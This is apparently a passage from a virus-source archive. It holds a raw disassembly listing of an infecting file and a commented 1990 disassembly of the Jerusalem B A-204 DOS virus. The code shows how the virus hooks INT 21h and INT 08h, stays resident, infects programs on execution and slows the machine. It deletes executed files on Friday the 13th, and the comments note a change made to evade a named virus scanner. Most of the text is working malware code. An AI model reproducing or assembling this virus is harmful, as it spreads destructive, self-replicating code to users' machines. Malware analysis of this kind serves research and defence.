0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH]
0000:04A8 8EC0 MOV ES,AX
0000:04AA 33F6 XOR SI,SI
0000:04AC 8BFE MOV DI,SI
0000:04AE B91007 MOV CX,0710H
0000:04B1 F3A4 REPE MOVSB
0000:04B3 8BD7 MOV DX,DI
0000:04B5 8B0E1100 MOV CX,[Y0011H]
0000:04B9 8B1E7000 MOV BX,[Y0070H]
0000:04BD 06 PUSH ES
0000:04BE 1F POP DS
0000:04BF B43F MOV AH,03FH
0000:04C1 CD21 INT 021H
0000:04C3 721C X04C3: JB X04E1
0000:04C5 03F9 ADD DI,CX
0000:04C7 33C9 XOR CX,CX
0000:04C9 8BD1 MOV DX,CX
0000:04CB B80042 MOV AX,04200H
0000:04CE CD21 INT 021H
"JV.MOC" PAGE 0010
0000:04D0 BE0500 MOV SI,0005H
0000:04D3 B90500 MOV CX,0005H
0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT
R (SI)
0000:04D9 8BCF MOV CX,DI
0000:04DB 33D2 XOR DX,DX
0000:04DD B440 MOV AH,040H
0000:04DF CD21 INT 021H
0000:04E1 720D X04E1: JB X04F0
0000:04E3 E9BC00 JMP X05A2
0000:04E6 B91C00 X04E6: MOV CX,001CH
0000:04E9 BA4F00 MOV DX,004FH
0000:04EC B43F MOV AH,03FH
0000:04EE CD21 INT 021H
0000:04F0 724A X04F0: JB X053C
0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H
0000:04F8 A15D00 MOV AX,Y005DH
0000:04FB A34500 MOV Y0045H,AX
0000:04FE A15F00 MOV AX,Y005FH
0000:0501 A34300 MOV Y0043H,AX
0000:0504 A16300 MOV AX,Y0063H
0000:0507 A34700 MOV Y0047H,AX
0000:050A A16500 MOV AX,Y0065H
0000:050D A34900 MOV Y0049H,AX
0000:0510 A15300 MOV AX,Y0053H
0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H
0000:0518 7401 JZ X051B
0000:051A 48 DEC AX
0000:051B F7267800 X051B: MUL WORD PTR [Y0078H]
0000:051F 03065100 ADD AX,[Y0051H]
0000:0523 83D200 ADC DX,0000H
0000:0526 050F00 ADD AX,000FH
0000:0529 83D200 ADC DX,0000H
0000:052C 25F0FF AND AX,0FFF0H
0000:052F A37C00 MOV Y007CH,AX
0000:0532 89167E00 MOV [Y007EH],DX
0000:0536 051007 ADD AX,0710H
0000:0539 83D200 ADC DX,0000H
0000:053C 723A X053C: JB X0578
0000:053E F7367800 DIV WORD PTR [Y0078H]
0000:0542 0BD2 OR DX,DX
0000:0544 7401 JZ X0547
0000:0546 40 INC AX
0000:0547 A35300 X0547: MOV Y0053H,AX
0000:054A 89165100 MOV [Y0051H],DX
0000:054E A17C00 MOV AX,Y007CH
0000:0551 8B167E00 MOV DX,[Y007EH]
0000:0555 F7367A00 DIV WORD PTR [Y007AH]
0000:0559 2B065700 SUB AX,[Y0057H]
0000:055D A36500 MOV Y0065H,AX
0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H
0000:0566 A35D00 MOV Y005DH,AX
0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H
0000:056F 33C9 XOR CX,CX
0000:0571 8BD1 MOV DX,CX
0000:0573 B80042 MOV AX,04200H
0000:0576 CD21 INT 021H
"JV.MOC" PAGE 0011
0000:0578 720A X0578: JB X0584
0000:057A B91C00 MOV CX,001CH
0000:057D BA4F00 MOV DX,004FH
0000:0580 B440 MOV AH,040H
0000:0582 CD21 INT 021H
0000:0584 7211 X0584: JB X0597
0000:0586 3BC1 CMP AX,CX
0000:0588 7518 JNZ X05A2
0000:058A 8B167C00 MOV DX,[Y007CH]
0000:058E 8B0E7E00 MOV CX,[Y007EH]
0000:0592 B80042 MOV AX,04200H
0000:0595 CD21 INT 021H
0000:0597 7209 X0597: JB X05A2
0000:0599 33D2 XOR DX,DX
0000:059B B91007 MOV CX,0710H
0000:059E B440 MOV AH,040H
0000:05A0 CD21 INT 021H
0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H
0000:05A8 7404 JZ X05AE
0000:05AA B449 MOV AH,049H
0000:05AC CD21 INT 021H
0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH
0000:05B4 7431 JZ X05E7
0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:05BB 2E8B167400 MOV DX,CS:[Y0074H]
0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H]
0000:05C5 B80157 MOV AX,05701H
0000:05C8 CD21 INT 021H
0000:05CA B43E MOV AH,03EH
0000:05CC CD21 INT 021H
0000:05CE 2EC5168000 LDS DX,CS:[Y0080H]
0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H]
0000:05D8 B80143 MOV AX,04301H
0000:05DB CD21 INT 021H
0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH]
0000:05E2 B82425 MOV AX,02524H
0000:05E5 CD21 INT 021H
0000:05E7 07 X05E7: POP ES
0000:05E8 1F POP DS
0000:05E9 5F POP DI
0000:05EA 5E POP SI
0000:05EB 5A POP DX
0000:05EC 59 POP CX
0000:05ED 5B POP BX
0000:05EE 58 POP AX
0000:05EF 9D POPF
0000:05F0 2EFF2E1700 JMP CS:[Y0017H]
0000:05F5 0000 X05F5: ADD [BX+SI],AL
0000:05F7 0000 ADD [BX+SI],AL
0000:05F9 0000 ADD [BX+SI],AL
0000:05FB 0000 ADD [BX+SI],AL
0000:05FD 0000 ADD [BX+SI],AL
0000:05FF 004D00 ADD [DI+00H],CL
0000:0602 000F ADD [BX],CL
0000:0604 0000 ADD [BX+SI],AL
0000:0606 0000 ADD [BX+SI],AL
"JV.MOC" PAGE 0012
0000:0608 0000 ADD [BX+SI],AL
0000:060A 0000 ADD [BX+SI],AL
0000:060C 0000 ADD [BX+SI],AL
0000:060E 0000 ADD [BX+SI],AL
0000:0610 CD20 INT 020H
0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH
0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID
0000:0619 F02F LOCK DAS
0000:061B 018E1E3C ADD [BP+Y03C1EH],CX
0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX
0000:0623 048E ADD AL,08EH
0000:0625 1E PUSH DS
0000:0626 8E1EFFFF MOV DS,[Y0FFFFH]
0000:062A FFFF ??? DI
0000:062C FFFF ??? DI
0000:062E FFFF ??? DI
0000:0630 FFFF ??? DI
0000:0632 FFFF ??? DI
0000:0634 FFFF ??? DI
0000:0636 FFFF ??? DI
0000:0638 FFFF ??? DI
0000:063A FFFF ??? DI
0000:063C 7C1F JL X065D
0000:063E DE3E8D29 ESC 037H,[Y0298DH]
0000:0642 1400 ADC AL,00H
0000:0644 1800 SBB [BX+SI],AL
0000:0646 F1 DB 0F1H
0000:0647 1F POP DS
0000:0648 FFFF ??? DI
0000:064A FFFF ??? DI
0000:064C 0000 ADD [BX+SI],AL
0000:064E 0000 ADD [BX+SI],AL
0000:0650 0000 ADD [BX+SI],AL
0000:0652 0000 ADD [BX+SI],AL
0000:0654 0000 ADD [BX+SI],AL
0000:0656 0000 ADD [BX+SI],AL
0000:0658 0000 ADD [BX+SI],AL
0000:065A 0000 ADD [BX+SI],AL
0000:065C 0000 ADD [BX+SI],AL
0000:065E 0000 ADD [BX+SI],AL
0000:0660 CD21 INT 021H
0000:0662 CB RET ; INTERSEGMENT
0000:0663 0000 X0663: ADD [BX+SI],AL
0000:0665 0000 ADD [BX+SI],AL
0000:0667 0000 ADD [BX+SI],AL
0000:0669 0000 ADD [BX+SI],AL
0000:066B 0000 ADD [BX+SI],AL
0000:066D 2020 AND [BX+SI],AH
0000:066F 2020 AND [BX+SI],AH
0000:0671 2020 AND [BX+SI],AH
0000:0673 2020 AND [BX+SI],AH
0000:0675 2020 AND [BX+SI],AH
0000:0677 2000 AND [BX+SI],AL
0000:0679 0000 ADD [BX+SI],AL
0000:067B 0000 ADD [BX+SI],AL
0000:067D 2020 AND [BX+SI],AH
"JV.MOC" PAGE 0013
0000:067F 2020 AND [BX+SI],AH
0000:0681 2020 AND [BX+SI],AH
0000:0683 2020 AND [BX+SI],AH
0000:0685 2020 AND [BX+SI],AH
0000:0687 2000 AND [BX+SI],AL
0000:0689 0000 ADD [BX+SI],AL
0000:068B 0000 ADD [BX+SI],AL
0000:068D 0000 ADD [BX+SI],AL
0000:068F 0000 ADD [BX+SI],AL
0000:0691 0D6B6F OR AX,06F6BH
0000:0694 6465 JZ X06FB
0000:0696 6572 JNZ X070A
0000:0698 7A2E JPE X06C8
0000:069A 6578 JNZ X0714
0000:069C 6520 JNZ X06BE
0000:069E 613A JNO X06DA
0000:06A0 6B6F JPO X0711
0000:06A2 6465 JZ X0709
0000:06A4 6572 JNZ X0718
0000:06A6 2E6578 JNZ X0721
0000:06A9 650D JNZ X06B8
0000:06AB 0000 ADD [BX+SI],AL
0000:06AD 0000 ADD [BX+SI],AL
0000:06AF 0000 ADD [BX+SI],AL
0000:06B1 0000 ADD [BX+SI],AL
0000:06B3 0000 ADD [BX+SI],AL
0000:06B5 0000 ADD [BX+SI],AL
0000:06B7 0000 ADD [BX+SI],AL
0000:06B9 0000 ADD [BX+SI],AL
0000:06BB 0000 ADD [BX+SI],AL
0000:06BD 0000 ADD [BX+SI],AL
0000:06BF 0000 ADD [BX+SI],AL
0000:06C1 0000 ADD [BX+SI],AL
0000:06C3 0000 ADD [BX+SI],AL
0000:06C5 0000 ADD [BX+SI],AL
0000:06C7 0000 ADD [BX+SI],AL
0000:06C9 0000 ADD [BX+SI],AL
0000:06CB 0000 ADD [BX+SI],AL
0000:06CD 0000 ADD [BX+SI],AL
0000:06CF 0000 ADD [BX+SI],AL
0000:06D1 0000 ADD [BX+SI],AL
0000:06D3 0000 ADD [BX+SI],AL
0000:06D5 0000 ADD [BX+SI],AL
0000:06D7 0000 ADD [BX+SI],AL
0000:06D9 005718 ADD [BX+018H],DL
0000:06DC 0825 OR [DI],AH
0000:06DE A5 MOVSW
0000:06DF FEC5 INC CH
0000:06E1 07 POP ES
0000:06E2 1E PUSH DS
0000:06E3 0210 ADD DL,[BX+SI]
0000:06E5 07 POP ES
0000:06E6 57 PUSH DI
0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
0000:06EB 0104 ADD [SI],AX
0000:06ED 7F70 JG X075F
"JV.MOC" PAGE 0014
0000:06EF 0010 ADD [BX+SI],DL
0000:06F1 07 POP ES
0000:06F2 1D001C SBB AX,01C00H
0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
0000:06F9 0C1B OR AL,01BH
0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
0000:06FF F24D REPNE DEC BP
0000:0701 360E PUSH CS
0000:0703 0300 ADD AX,[BX+SI]
0000:0705 0000 ADD [BX+SI],AL
0000:0707 00EE ADD DH,CH
0000:0709 002A X0709: ADD [BP+SI],CH
0000:070B 0F POP CS
0000:070C 42 INC DX
0000:070D 01C1 ADD CX,AX
0000:070F 0DB44C OR AX,04CB4H
0000:0712 B000 MOV AL,00H
0000:0714 CD21 X0714: INT 021H
0000:0716 4D DEC BP
0000:0717 7344 JAE X075D
0000:0719 6F73 JG X078E

MSDOS/J-Index/Virus.MSDOS.Unknown.jerub204.asm
+977
View File
@@ -0,0 +1,977 @@
Virus : Jerusalem Version B Variant A-204
Disassembled by : Righard Zwienenberg
Steenwijklaan 302
2541 RT The Hague
The Netherlands
Data : +31-70-3898822, V22,V22b,HST,MNP,CM
Voive : +31-70-3675379
FidoNet address : 2:512/2.3
Used Software : ASMGEN, DEBUG and D86-Disassembler
Date : 20 june 1990
Note : All Values are hex. If a value is followd by d (e.g. 30d) it means
30 decimal.
Note : This disassembly consists of two programs. The original program was
a dummy file (20h bytes long) containing 1Fh times 90 RET and 01h time
C3 RET.
0100 E9 92 00 JMP 0195 ; JUMP -> 0195h
0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used
010A dw 00 01 ; Startaddress original program
010C dw 01 56 ; Startaddress-offset original program
010E db 00 ; Trigger for destruction (delete file)
; Always zero, but if it is Friday the 13th and the year is
; not equal 1987 this byte is set to one
010F dw 00 00 ; Storing place for original AX (read-only word)
0111 dw 20 00 ; Length of Original Program (0020h)
0113 dw A5 FE ; Storing place for original BX of INT 08h vector
0115 dw 00 F0 ; Storing place for original ES of INT 08h vector
0117 dw 60 14 ; Storing place for original BX of INT 21h vector
0119 dw 2B 02 ; Storing place for original ES of INT 21h vector
011B dw 56 05 ; Storing place for original BX of INT 24h vector
011D dw DE 0C ; Storing place for original ES of INT 24h vector
011F dw 40 7E ; Storing place for timer for 30 minutes trigger
; By init. set to 7E90h
; The following words are never used by the virus. The are used
; by a routine starting at 0398h which is executed when INT 21h
; is called with AH=DEh. This never happens in the code.
0121 dw 00 00 ;
0123 dw 00 00 ;
0125 dw 00 00 ;
0127 dw 00 00 ;
0129 dw 00 00 ;
012B dw 00 00 ;
012D dw 00 E8 ;
012F dw 06 EC ;
0131 dw 91 16 ; Storing place for original ES
0133 dw 80 00 ; Storing place for BX. Never read again
0135 00 00 00 80 00
0139 dw 91 16 ; Storing place for original ES
013B 5C 00
013D dw 91 16 ; Storing place for original ES
013F 6C 00 ;
0141 dw 91 16 ; Temp. storing place for original ES
0143 dw 00 20 ; Temp. storing place for AX
0145 dw 0D 1F ; Temp. storing place for ES+10h
0147 dw 5F 21 ; Storing place for AX
0149 dw A1 16 ; Temp. storing place for ES+10h
014B dw 00 F0 ; Temp. storing place for AX
014D db 02 ; Temp. storing place for AL
014E db 00 ; COM/EXE indicator
; 0 = EXE-File
; 1 = COM-File
0151 dw 30 01 ; Temp. storing place for DX
0153 dw 23 00 ; Temp. storing place for AX
0155 20 01
0157 dw 4A 00 ; Read Only!!! The code only read this word to substract it
; from AX
0159 D4 06 D4 06
015D dw 98 03 ; Temp. Storing place to store AX
015F dw 10 07 ; Probably startaddress of virus in mem
0161 dw 84 19 ; Never used!!! 1984h is stored here by the code
0163 dw C5 00 ; 00C5h is being read and put back later by the code
0165 dw 99 03 ; Temp. storing place for AX
0167 1C 00 00 00 90 90 90 90 C3
0170 dw 05 00 ; Storing place for file handle (BX)
0172 dw 20 00 ; Storing place for file attributes
; bit 0 = read only
; bit 1 = hidden file
; bit 2 = system file
; bit 3 = volume label
; bit 4 = subdirectory
; bit 5 = archive bit
; bit 8 = shareable (Novell Network)
0174 dw D5 14 ; Storing place for file date (DX)
0176 dw 99 83 ; Storing place for file time (CX)
0178 dw 00 02 ; 0200h=512d Used as multiplier/divider
017A dw 10 00 ; 0001h= 1d Used as multiplier/divider
017C dw 20 3E ; Temp. storing place for AX
017E dw 00 00 ; Temp. storing place for DX
0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename
0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename
0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM
; May not become infected
018F dw 01 00 ; Storing place for variable-result of free-memory-scan
; 0000h : not enough memory available
; 0001h : enough memory available
0191 00 00 00 00
0195 FC CLD ; Clear Direct
0196 B4 E0 MOV AH,0E0 ; This is the check if the
0198 CD 21 INT 021 ; virus is already active
; in memory. INT 21h with
; AH=E0h will return AX=0300h
; if the virus is active.
019A 80 FC E0 CMP AH,0E0 ; AH>=E0h?
019D 73 16 JAE 01B5 ; Yes: -> 01B5h
019F 80 FC 03 CMP AH,3 ; AH<-03h?
01A2 72 11 JB 01B5 ; Yes: -> 01B5h
; INT 21h with AH=
; DDh,DEh,E0h
; are self-defined.
; SetUp for
; Executing original program
; We come here if an infected
; program is executed and the
; virus is already active in
; memory.
01A4 B4 DD MOV AH,0DD ;
01A6 BF 00 01 MOV DI,0100 ; Destination Index = 0100h
01A9 BE 10 07 MOV SI,0710 ; Source Index = 0710h
01AC 03 F7 ADD SI,DI ; Source Index:= 0810h
; At this place the original
; Program is located
01AE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=20h (length original
; Program)
01B3 CD 21 INT 021 ;
; Here we come when the virus
; is not yet in memory
01B5 8C C8 MOV AX,CS ; AX=Code Segment
01B7 05 10 00 ADD AX,010 ; AX:=AX+10h
01BA 8E D0 MOV SS,AX ; Stack Segment:=AX
01BC BC 00 07 MOV SP,0700 ; StackPointer = 0700h
01BF 50 PUSH AX ; Store AX
01C0 B8 C5 00 MOV AX,0C5 ; AX = C5h
01C3 50 PUSH AX ; Store AX
01C4 CB RETF ; -> C5h
01C5 FC CLD ; Clear Direct
01C6 06 PUSH ES ; Store ES
01C7 2E 8C 06 31 00 CS MOV W[031],ES ; Store ES
01CC 2E 8C 06 39 00 CS MOV W[039],ES ; in storage places
01D1 2E 8C 06 3D 00 CS MOV W[03D],ES ;
01D6 2E 8C 06 41 00 CS MOV W[041],ES ;
01DB 8C C0 MOV AX,ES ; AX=ES
01DD 05 10 00 ADD AX,010 ; AX=AX+10h
01E0 2E 01 06 49 00 CS ADD W[049],AX ; Add AX (ES+10h) to 0149h
01E5 2E 01 06 45 00 CS ADD W[045],AX ; and 0145h
01EA B4 E0 MOV AH,0E0 ; AH=E0h (Self defined)
01EC CD 21 INT 021 ; CALL INT 21h
01EE 80 FC E0 CMP AH,0E0 ; AH>=0Eh?
01F1 73 13 JAE 0206 ; Yes: -> 0206
01F3 80 FC 03 CMP AH,3 ; AH=03h? Must be if the
; viruscode is in memory
; and interrupt 21h is called
; with AH=E0h.
01F6 07 POP ES ; Restore original ES
01F7 2E 8E 16 45 00 CS MOV SS,W[045] ; SS=ES+10h
01FC 2E 8B 26 43 00 CS MOV SP,W[043] ;
0201 2E FF 2E 47 00 CS JMP D[047] ;
0206 33 C0 XOR AX,AX ; AX=0000h
0208 8E C0 MOV ES,AX ; ES=0000h
020A 26 A1 FC 03 ES MOV AX,W[03FC]
; Here the A-204 variant
; differs for the first
; time from the original
; Jerusalem Version B virus.
020E 26 A0 FE 03 ES MOV AL,B[03FE] ; These two line have been
0212 2E A3 4B 00 CS MOV W[04B],AX ; changed in order
; to avoid being
; detected by ViruScan from
; John McAfee.
0216 2E A2 4D 00 CS MOV B[04D],AL
021A 26 C7 06 FC 03 F3 A5 ES MOV W[03FC],0A5F3
0221 26 C6 06 FE 03 CB ES MOV B[03FE],0CB
0227 58 POP AX
0228 05 10 00 ADD AX,010
022B 8E C0 MOV ES,AX
022D 0E PUSH CS ; Store CS
022E 1F POP DS ; DS=CS
022F B9 10 07 MOV CX,0710 ; CX=0710h
0232 D1 E9 SHR CX,1 ; CX >> 1 (CX:=0308h)
0234 33 F6 XOR SI,SI ; SI=0000h
0236 8B FE MOV DI,SI ; DI=0000h
0238 06 PUSH ES ; Store ES
0239 B8 42 01 MOV AX,0142 ; AX=0142h
023C 50 PUSH AX ; Store AX
023D EA FC 03 00 00 JMP 0:03FC
0242 8C C8 MOV AX,CS ; AX=CS
0244 8E D0 MOV SS,AX ; SS=CS
0246 BC 00 07 MOV SP,0700 ; SP=0700h
0249 33 C0 XOR AX,AX ; AX=0000h
024B 8E D8 MOV DS,AX ; DS=0000h
024D 2E A1 4B 00 CS MOV AX,W[04B] ; Restore AX
0251 A3 FC 03 MOV W[03FC],AX ; Store AX
0254 2E A0 4D 00 CS MOV AL,B[04D] ; Restore AL
0258 A2 FE 03 MOV B[03FE],AL ; Store AL
025B 8B DC MOV BX,SP ; BX=SP
025D B1 04 MOV CL,4 ; CL=04h
025F D3 EB SHR BX,CL ; BX >> 4
0261 83 C3 10 ADD BX,010 ; BX=BX+10h
0264 2E 89 1E 33 00 CS MOV W[033],BX ; Store BX. Why I don't know,
; the storing place is never
; read again
0269 B4 4A MOV AH,04A ;
026B 2E 8E 06 31 00 CS MOV ES,W[031] ; Restore ES
0270 CD 21 INT 021 ; Adjust Memory Block Size
; (SETBLOCK)
0272 B8 21 35 MOV AX,03521 ; Get original INT 21h
0275 CD 21 INT 021 ; vector
0277 2E 89 1E 17 00 CS MOV W[017],BX ; Store BX and ES of INT 21h
027C 2E 8C 06 19 00 CS MOV W[019],ES ; vector
0281 0E PUSH CS ; Store CS
0282 1F POP DS ; DS=CS
0283 BA 5B 02 MOV DX,025B ; DX=025Bh
0286 B8 21 25 MOV AX,02521 ; Set new INT 21h
0289 CD 21 INT 021 ; vector on DS:025Bh
028B 8E 06 31 00 MOV ES,W[031] ; Restore original ES
028F 26 8E 06 2C 00 ES MOV ES,W[02C] ;
0294 33 FF XOR DI,DI ; DI=0000h
0296 B9 FF 7F MOV CX,07FFF ; CX=7FFFh
0299 32 C0 XOR AL,AL ; AL=0000h
029B F2 AE REPNE SCASB ;
029D 26 38 05 ES CMP B[DI],AL ;
02A0 E0 F9 LOOPNE 029B ; No Flags: DEC CX -> 02A2h
; IF CX<>0 and not equal
; -> 029B
02A2 8B D7 MOV DX,DI ; DX=DI
02A4 83 C2 03 ADD DX,3 ; DX=DX+03h
02A7 B8 00 4B MOV AX,04B00 ; AX=4B00h
02AA 06 PUSH ES ; Store ES
02AB 1F POP DS ; Restore DS (DS:=ES)
02AC 0E PUSH CS ; Store CS
02AD 07 POP ES ; Restore ES (ES:=CS)
02AE BB 35 00 MOV BX,035 ; BX=35h
02B1 1E PUSH DS ; Store Registers
02B2 06 PUSH ES
02B3 50 PUSH AX
02B4 53 PUSH BX
02B5 51 PUSH CX
02B6 52 PUSH DX
02B7 B4 2A MOV AH,02A ; Get Current Date
02B9 CD 21 INT 021 ; DL=day
; DH=month
; CX=year
; AL=Day of the week
02BB 2E C6 06 0E 00 00 CS MOV B[0E],0 ; Set Trigger for deleting
; infected files to 00h
02C1 81 F9 C3 07 CMP CX,07C3 ; Is year 1987 ?
02C5 74 30 JE 02F7 ; Yes: -> 02F7h
02C7 3C 05 CMP AL,5 ; Is it Friday ?
02C9 75 0D JNE 02D8 ; No: -> 02D8h
02CB 80 FA 0D CMP DL,0D ; Is it 13th ?
02CE 75 08 JNE 02D8 ; No: -> 02D8h
; Yes: it is Friday
; the 13th and the
; year is not equal 1987
02D0 2E FE 06 0E 00 CS INC B[0E] ; Set Trigger for deleting
; infected files to 01h
02D5 EB 20 JMP 02F7 ; JUMP -> 02F7h
02D7 90 NOP
02D8 B8 08 35 MOV AX,03508 ; Get original INT 8h
02DB CD 21 INT 021 ; vector
02DD 2E 89 1E 13 00 CS MOV W[013],BX ; Store original BX
02E2 2E 8C 06 15 00 CS MOV W[015],ES ; and ES of INT 08h vector
02E7 0E PUSH CS
02E8 1F POP DS
02E9 C7 06 1F 00 90 7E MOV W[01F],07E90 ; Store 30d minutes into
; timer interrupt. This
; value is decreased by
; one 18.2 times per second
02EF B8 08 25 MOV AX,02508 ; Set new INT 8h vector
02F2 BA 1E 02 MOV DX,021E ; to DS:021Eh
02F5 CD 21 INT 021 ;
02F7 5A POP DX ; Restore Registers
02F8 59 POP CX
02F9 5B POP BX
02FA 58 POP AX
02FB 07 POP ES
02FC 1F POP DS
02FD 9C PUSHF ; Store Flags
02FE 2E FF 1E 17 00 CS CALL D[017] ; Call original INT 21h
; address
0303 1E PUSH DS ; Restore DS
0304 07 POP ES ; Store ES
0305 B4 49 MOV AH,049 ; Free Memory
0307 CD 21 INT 021 ;
0309 B4 4D MOV AH,04D ; Get ExitCode of
030B CD 21 INT 021 ; SubProgram (WAIT)
; Stored in AL
030D B4 31 MOV AH,031 ; AX=31[AL]h
030F BA 00 06 MOV DX,0600 ; DX=600h
0312 B1 04 MOV CL,4 ; CL=04h
0314 D3 EA SHR DX,CL ; DX >> 4 (DX=60H)
0316 83 C2 10 ADD DX,010 ; DX=DX+10h (DX=70h)
; Program Size in Paragraphs
; is 70h Bytes
0319 CD 21 INT 021 ; Terminate but Stay Resident
031B 32 C0 XOR AL,AL ; Clear AL
031D CF IRET ; Interrupt Return
; 031Eh is the new INT 08h
; vector. This routine is
; called 18.2 times per
; second
031E 2E 83 3E 1F 00 02 CS CMP W[01F],2 ; Timer decreased til 02h?
0324 75 17 JNE 033D ; No: -> 033D
; Yes: now 32 minutes are
; passed since infection
0326 50 PUSH AX ; Store Registers
0327 53 PUSH BX
0328 51 PUSH CX
0329 52 PUSH DX
032A 55 PUSH BP
032B B8 02 06 MOV AX,0602 ; Scroll box with coordinates
032E B7 87 MOV BH,087 ; (5h,5h),(10h,10h) two
0330 B9 05 05 MOV CX,0505 ; lines upwards
0333 BA 10 10 MOV DX,01010 ;
0336 CD 10 INT 010 ;
0338 5D POP BP ; Restore Registers
0339 5A POP DX
033A 59 POP CX
033B 5B POP BX
033C 58 POP AX
033D 2E FF 0E 1F 00 CS DEC W[01F] ; Decrease Timer-Trigger
; This now becomes 01h
0342 75 12 JNE 0356 ; If 0: -> 0356h
0344 2E C7 06 1F 00 01 00 CS MOV W[01F],1 ; Timer-Trigger set to 01h
034B 50 PUSH AX ; Store AX
034C 51 PUSH CX ; Store CX
034D 56 PUSH SI ; Store SI
034E B9 01 40 MOV CX,04001 ; CX=4001h
0351 F3 AC REP LODSB ; Load byte [SI] into AL and
; advance SI, done CX times.
; This is the routine which
; decreases the speed of the
; machine til 1/5th of the
; original. 32 minutes after
; infection this routine is
; executes 18.2 times a second
0353 5E POP SI ; Restore SI
0354 59 POP CX ; Restore CX
0355 58 POP AX ; Restore AX
0356 2E FF 2E 13 00 CS JMP D[013] ; Jump to original INT 08h
; address
; Here we come if INT 21h is
; called
035B 9C PUSHF ; Store Flags
035C 80 FC E0 CMP AH,0E0 ; AH=0Eh ?
035F 75 05 JNE 0366 ; No: -> 0366h
0361 B8 00 03 MOV AX,0300 ; AX=0300h
0364 9D POPF ; Restore Flags
0365 CF IRET ; Interrupt Return
0366 80 FC DD CMP AH,0DD ; AH=DDh?
0369 74 13 JE 037E ; Yes: -> 037Eh
036B 80 FC DE CMP AH,0DE ; AH=DEh?
036E 74 28 JE 0398 ; Yes: -> 0398h
; INT 21h is never called
; with AH=DEh. So the routine
; at 0398h is never used
; (seems)
0370 3D 00 4B CMP AX,04B00 ; Load & Execute ?
0373 75 03 JNE 0378 ; No: -> 0378h
0375 E9 B4 00 JMP 042C ; Yes: -> 042Ch
0378 9D POPF ; Restore Flags
0379 2E FF 2E 17 00 CS JMP D[017] ; Jmp to original
; INT 21h address
; Execute original program
037E 58 POP AX
037F 58 POP AX ; Restore AX
0380 B8 00 01 MOV AX,0100 ; AX=0100h
0383 2E A3 0A 00 CS MOV W[0A],AX ; Store AX
0387 58 POP AX ; Restore AX
0388 2E A3 0C 00 CS MOV W[0C],AX ; Store AX
038C F3 A4 REP MOVSB ;
038E 9D POPF ; Restore Flags
038F 2E A1 0F 00 CS MOV AX,W[0F] ; AX=0000h
0393 2E FF 2E 0A 00 CS JMP D[0A] ; JUMP -> CS:0100h
; This executes the original
; program
; This routine is called
; when INT 21h with AH=DEh
; is called which never
; happens in the code. I
; have to investigate it
; a bit more. Til then
; it remains without comments.
0398 83 C4 06 ADD SP,6
039B 9D POPF
039C 8C C8 MOV AX,CS
039E 8E D0 MOV SS,AX
03A0 BC 10 07 MOV SP,0710
03A3 06 PUSH ES
03A4 06 PUSH ES
03A5 33 FF XOR DI,DI
03A7 0E PUSH CS
03A8 07 POP ES
03A9 B9 10 00 MOV CX,010
03AC 8B F3 MOV SI,BX
03AE BF 21 00 MOV DI,021
03B1 F3 A4 REP MOVSB
03B3 8C D8 MOV AX,DS
03B5 8E C0 MOV ES,AX
03B7 2E F7 26 7A 00 CS MUL W[07A]
03BC 2E 03 06 2B 00 CS ADD AX,W[02B]
03C1 83 D2 00 ADC DX,0
03C4 2E F7 36 7A 00 CS DIV W[07A]
03C9 8E D8 MOV DS,AX
03CB 8B F2 MOV SI,DX
03CD 8B FA MOV DI,DX
03CF 8C C5 MOV BP,ES
03D1 2E 8B 1E 2F 00 CS MOV BX,W[02F]
03D6 0B DB OR BX,BX
03D8 74 13 JE 03ED
03DA B9 00 80 MOV CX,08000
03DD F3 A5 REP MOVSW
03DF 05 00 10 ADD AX,01000
03E2 81 C5 00 10 ADD BP,01000
03E6 8E D8 MOV DS,AX
03E8 8E C5 MOV ES,BP
03EA 4B DEC BX
03EB 75 ED JNE 03DA
03ED 2E 8B 0E 2D 00 CS MOV CX,W[02D]
03F2 F3 A4 REP MOVSB
03F4 58 POP AX
03F5 50 PUSH AX
03F6 05 10 00 ADD AX,010
03F9 2E 01 06 29 00 CS ADD W[029],AX
03FE 2E 01 06 25 00 CS ADD W[025],AX
0403 2E A1 21 00 CS MOV AX,W[021]
0407 1F POP DS
0408 07 POP ES
0409 2E 8E 16 29 00 CS MOV SS,W[029]
040E 2E 8B 26 27 00 CS MOV SP,W[027]
0413 2E FF 2E 23 00 CS JMP D[023]
; We come here if B[0Eh]=1,
; which means Friday 13th,
; year<>1987. This routine
; deletes the loaded file.
0418 33 C9 XOR CX,CX ; Clear all bits of the File
; Attribute
041A B8 01 43 MOV AX,04301 ;
041D CD 21 INT 021 ; Put File Atributes
041F B4 41 MOV AH,041 ;
0421 CD 21 INT 021 ; Delete a File (Unlink)
0423 B8 00 4B MOV AX,04B00
0426 9D POPF ; Get Flags
0427 2E FF 2E 17 00 CS JMP D[017]
; We come here each time a
; file is loaded with the
; load and execute call
; (INT 21h, AX=4B00h)
042C 2E 80 3E 0E 00 01 CS CMP B[0E],1 ; Is it Friday 13th,
; year<>1987?
0432 74 E4 JE 0418 ; Yes: -> 0418h
0434 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle -1 ???
043B 2E C7 06 8F 00 00 00 CS MOV W[08F],0 ; Clear Memory-Available
; variable
0442 2E 89 16 80 00 CS MOV W[080],DX ; DS:DX -> ASCIZ Filename,
0447 2E 8C 1E 82 00 CS MOV W[082],DS ; Store DX and DS
